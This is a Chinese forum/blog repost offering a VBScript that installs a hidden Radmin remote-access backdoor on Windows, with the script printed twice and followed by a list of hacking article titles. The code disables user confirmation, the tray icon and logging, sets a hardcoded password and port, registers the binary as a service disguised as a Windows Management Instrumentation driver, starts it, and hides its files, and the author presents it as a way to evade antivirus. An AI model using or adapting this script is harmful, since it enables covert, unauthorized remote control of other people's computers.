利用Vbs脚本实现radmin终极后门
来源:互联网 发布:北方汉子性格特点知乎 编辑:程序博客网 时间:2024/05/18 01:45
导读:
在网上看到N多人做radmin后门,要导出注册表而且还用被杀软件K杀。所以本人把自己写的脚本提供大家分享。比较实用,希望大家喜欢。
on error resume next
const HKEY_LOCAL_MACHINE = &H80000002
strComputer = "."
Set StdOut = WScript.StdOut
Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!//" &_
strComputer &"/root/default:StdRegProv")
strKeyPath = "SYSTEM/RAdmin"
oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
strKeyPath = "SYSTEM/RAdmin/v2.0"
oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
strKeyPath = "SYSTEM/RAdmin/v2.0/Server"
oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
strKeyPath = "SYSTEM/RAdmin/v2.0/Server/iplist"
oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
strKeyPath = "SYSTEM/RAdmin/v2.0/Server/Parameters"
oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
Set objRegistry = GetObject("Winmgmts:root/default:StdRegProv")
BBS.bitsCN.com网管论坛
strPath = "SYSTEM/RAdmin/v2.0/Server/Parameters"
uBinary = Array(0,0,0,0)
Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"AskUser",uBinary)
uBinary = Array(0,0,0,0)
Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"AutoAllow",uBinary)
uBinary = Array(1,0,0,0)
Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"DisableTrayIcon",uBinary)
uBinary = Array(0,0,0,0)
Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"EnableEventLog",uBinary)
uBinary = Array(0,0,0,0)
Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"EnableLogFile",uBinary)
uBinary = Array(0,0,0,0)
Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"FilterIp",uBinary)
uBinary = Array(0,0,0,0)
Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"NTAuthEnabled",uBinary)
uBinary = Array(198,195,162,215,37,223,10,224,99,83,126,32,212,173,208,119) //此为注册表导出十六进制转为十进制数据 pass:241241241
bitsCN.nET*中国网管博客
Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"Parameter",uBinary) //Radmin密码
uBinary = Array(5,4,0,0) //端口:1029
Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"Port",uBinary)
uBinary = Array(10,0,0,0)
Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"Timeout",uBinary)
Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!//" &strComputer &"/root/default:StdRegProv")
strKeyPath = "SYSTEM/RAdmin/v2.0/Server/Parameters"
strValueName = "LogFilePath"
strValue = "c:/logfile.txt"
set wshshell=createobject ("wscript.shell")
a=wshshell.run ("sc.exe create WinManageHelp binpath= %systemroot%/system32/Exporer.exe start= auto",0)
oReg.SetStringValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue
Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!//" &strComputer &"/root/default:StdRegProv")
[bitsCN.Com]
strKeyPath = "SYSTEM/ControlSet001/Services/WinManageHelp"
strValueName = "Description"
strValue = "Windows Media PlayerWindows Management Instrumentation Player Drivers."
oReg.SetStringValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue
strValueName = "DisplayName"
strValue = "Windows Management Instrumentation Player Drivers"
oReg.SetStringValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue
strValueName = "ImagePath"
strValue = "c:/windows/system32/Exporer.exe /service"
oReg.SetExpandedStringValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue
set wshshell=createobject ("wscript.shell")
a=wshshell.run ("net start WinManageHelp",0)
b=wshshell.run ("attrib +r +h +s %systemroot%/system32/exporer.exe",0)
c=wshshell.run ("attrib +r +h +s %systemroot%/system32/AdmDll.dll",0)
d=wshshell.run ("attrib +r +h +s %systemroot%/system32/raddrv.dll",0)
本文转自
http://www.bitscn.com/hack/safe/200802/124316.html
在网上看到N多人做radmin后门,要导出注册表而且还用被杀软件K杀。所以本人把自己写的脚本提供大家分享。比较实用,希望大家喜欢。
on error resume next
const HKEY_LOCAL_MACHINE = &H80000002
strComputer = "."
Set StdOut = WScript.StdOut
Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!//" &_
strComputer &"/root/default:StdRegProv")
strKeyPath = "SYSTEM/RAdmin"
oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
strKeyPath = "SYSTEM/RAdmin/v2.0"
oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
strKeyPath = "SYSTEM/RAdmin/v2.0/Server"
oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
strKeyPath = "SYSTEM/RAdmin/v2.0/Server/iplist"
oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
strKeyPath = "SYSTEM/RAdmin/v2.0/Server/Parameters"
oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
Set objRegistry = GetObject("Winmgmts:root/default:StdRegProv")
BBS.bitsCN.com网管论坛
strPath = "SYSTEM/RAdmin/v2.0/Server/Parameters"
uBinary = Array(0,0,0,0)
Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"AskUser",uBinary)
uBinary = Array(0,0,0,0)
Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"AutoAllow",uBinary)
uBinary = Array(1,0,0,0)
Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"DisableTrayIcon",uBinary)
uBinary = Array(0,0,0,0)
Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"EnableEventLog",uBinary)
uBinary = Array(0,0,0,0)
Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"EnableLogFile",uBinary)
uBinary = Array(0,0,0,0)
Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"FilterIp",uBinary)
uBinary = Array(0,0,0,0)
Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"NTAuthEnabled",uBinary)
uBinary = Array(198,195,162,215,37,223,10,224,99,83,126,32,212,173,208,119) //此为注册表导出十六进制转为十进制数据 pass:241241241
bitsCN.nET*中国网管博客
Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"Parameter",uBinary) //Radmin密码
uBinary = Array(5,4,0,0) //端口:1029
Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"Port",uBinary)
uBinary = Array(10,0,0,0)
Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"Timeout",uBinary)
Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!//" &strComputer &"/root/default:StdRegProv")
strKeyPath = "SYSTEM/RAdmin/v2.0/Server/Parameters"
strValueName = "LogFilePath"
strValue = "c:/logfile.txt"
set wshshell=createobject ("wscript.shell")
a=wshshell.run ("sc.exe create WinManageHelp binpath= %systemroot%/system32/Exporer.exe start= auto",0)
oReg.SetStringValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue
Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!//" &strComputer &"/root/default:StdRegProv")
[bitsCN.Com]
strKeyPath = "SYSTEM/ControlSet001/Services/WinManageHelp"
strValueName = "Description"
strValue = "Windows Media PlayerWindows Management Instrumentation Player Drivers."
oReg.SetStringValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue
strValueName = "DisplayName"
strValue = "Windows Management Instrumentation Player Drivers"
oReg.SetStringValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue
strValueName = "ImagePath"
strValue = "c:/windows/system32/Exporer.exe /service"
oReg.SetExpandedStringValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue
set wshshell=createobject ("wscript.shell")
a=wshshell.run ("net start WinManageHelp",0)
b=wshshell.run ("attrib +r +h +s %systemroot%/system32/exporer.exe",0)
c=wshshell.run ("attrib +r +h +s %systemroot%/system32/AdmDll.dll",0)
d=wshshell.run ("attrib +r +h +s %systemroot%/system32/raddrv.dll",0)
本文转自
http://www.bitscn.com/hack/safe/200802/124316.html
- 利用Vbs脚本实现radmin终极后门
- 利用adsutil.vbs+../+cmd.asp打造完美后门(alpha)
- vbs脚本实现“多线程”下载
- vbs脚本实现Ping功能
- 留个VBS后门!
- 利用VBS脚本后台启动frp服务
- 利用计划任务和VBS脚本实现自动WEB共享文件夹里的文件
- radmin
- Sql Injection脚本注入终极利用方法
- VBS脚本——实现立即关机
- VBS脚本完美实现开机延时启动
- 通过vbs脚本实现批处理后台运行
- VBS脚本完美实现开机延时启动
- 利用vbs类实现css按钮
- 利用VBS实现简单的注册表操作
- 利用VBS实现 显示服务列表
- VBS脚本
- vbs脚本
- 忘了NOD32密码的解决方法
- 不能使用asp标记时的解决方法
- 不会被抓的5大黑客
- 手工清除“MSN布克”病毒的方法
- 入侵防御系统的发展
- 利用Vbs脚本实现radmin终极后门
- 三种禁用虚拟机FSO组件的方法
- 教你aspx马免杀的小技巧
- URL重写
- 黑客入侵思维官方网站全过程
- Apple Mac OS X 2008-001更新修复多个安全漏洞
- ClamAV堆溢出及整数溢出漏洞
- Apple iPhone和iPod Touch Foundation参数内存破坏漏洞
- KAME Project IPv6 IPComp头远程拒绝服务漏洞